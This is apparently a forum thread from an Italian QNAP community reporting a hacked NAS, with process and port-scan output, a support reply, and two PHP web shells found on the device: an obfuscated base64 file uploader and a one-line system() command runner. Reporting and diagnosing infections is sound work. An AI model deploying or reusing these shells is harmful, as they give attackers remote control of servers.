QNAP Club Italia

Codice: Seleziona tutto

CPU: 57.1% usr  7.9% sys  0.1% nic 32.7% idle  0.2% io  0.0% irq  1.7% sirq
Load average: 5.50 4.24 3.33 8/1026 9067
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
 8049     1 httpdusr S     321m  4.0   0 48.3 {257853} sh

Codice: Seleziona tutto

12:42:10 up  2:07,  load average: 3.34, 2.17, 1.85
CPU: 54.1% usr  6.2% sys  2.0% nic 18.7% idle 18.7% io  0.0% irq  0.0% sirq
Load average: 3.34 2.17 1.85 3/998 23111
  PID  PPID USER     STAT   VSZ %VSZ CPU %CPU COMMAND
21211     1 httpdusr S     308m  3.9   3 49.9 {2521026} sh

Codice: Seleziona tutto

[~] # ps ax | grep 21211
21211 httpdusr   7708 S   sh

Codice: Seleziona tutto

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
631/tcp   open  ipp
1723/tcp  open  pptp
2049/tcp  open  nfs
3306/tcp  open  mysql
3493/tcp  open  nut
4000/tcp  open  remoteanything
4001/tcp  open  newoak
8080/tcp  open  http-proxy
30000/tcp open  ndmps

Codice: Seleziona tutto

It appears to be a malware attack.

I've noted this and will escalate this to development with high priority.

Please be sure to keep your Malware Remover updated.

If it reoccurs, please let me know.

Kind regards,

Codice: Seleziona tutto

<?php eval(base64_decode('ZWNobyAiPHRpdGxlPm11aHN0aWs8L3RpdGxlPjxiciAvPiI7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7ZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIERvbmUuPGI+PGJyPjxicj4nOyB9ZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQuPC9iPjxicj48YnI+JzsgfX0K')); ?>

Codice: Seleziona tutto

CMD2015<br><pre><?php @system($_GET['cmd']);?></pre>